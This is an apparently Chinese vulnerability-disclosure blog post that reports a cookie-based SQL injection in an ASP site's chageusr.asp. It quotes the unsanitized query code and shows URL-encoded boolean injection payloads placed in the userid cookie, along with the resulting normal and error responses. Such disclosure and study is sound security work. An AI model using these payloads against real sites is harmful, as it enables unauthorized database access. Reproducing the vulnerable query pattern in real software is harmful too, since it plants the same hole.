cookies注入 大家要好好研究下
作者:非零解
blog:http://www.nonzero.cn
欢迎转载,转载,请注明版权。在公布漏洞之前已经通知了官方。
漏洞:cookies注入
漏洞文件:chageusr.asp等
前提:注册会员
漏洞描述:
set rs=server.createobject("adodb.recordset")
sql="select * from users where userid=’"&request.cookies("userid")&"’ and password=’"&request.cookies("password")&"’"
rs.open sql,conn,1,3
在对cookies的值userid和password未过滤直接执行sql语句,导致sql注入
漏洞利用:
用明小子等cookies修改工具,登陆用户后得到cookies如下:
userid=nonzero; okerer=yesok; myter=yes; login=4B7TM9; password=7a57a5a743894a0e; tc_total_cookie_datetime_14734=2007-4-10%2014%3A6%3A30; ASPSESSIONIDAQBCSDDT=DLGNGEIDLPKOKLMFCFOKCDHI
以userid=nonzero注入,提交userid=nonzero’ and ’1’=’1后sql语句变为:select * from users where userid=’nonzero’ and ’1’=’1’把单引号合闭。首先还要把改为16进制为:%27% 20%61%6E%64%20%27%31%27%3D%27%31,然后提交cookies,如下:
userid=nonzero%27%20%61%6E%64%20%27%31%27%3D%27%31; okerer=yesok; myter=yes; login=4B7TM9; password=7a57a5a743894a0e; tc_total_cookie_datetime_14734=2007-4-10% 2014%3A6%3A30; ASPSESSIONIDAQBCSDDT=DLGNGEIDLPKOKLMFCFOKCDHI
页面返回正常,然后再把’ and ’1’=’2编码,提交
userid=nonzero%27%20%61%6E%64%20%27%31%27%3D%27%32; okerer=yesok; myter=yes; login=4B7TM9; password=7a57a5a743894a0e; tc_total_cookie_datetime_14734=2007-4-10% 2014%3A6%3A30; ASPSESSIONIDAQBCSDDT=DLGNGEIDLPKOKLMFCFOKCDHI
返回数据为:
错误类型:
ADODB.Field (0x800A0BCD)
BOF 或 EOF 中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。
/wlgf/www/vod/chageusr.asp, 第 103 行
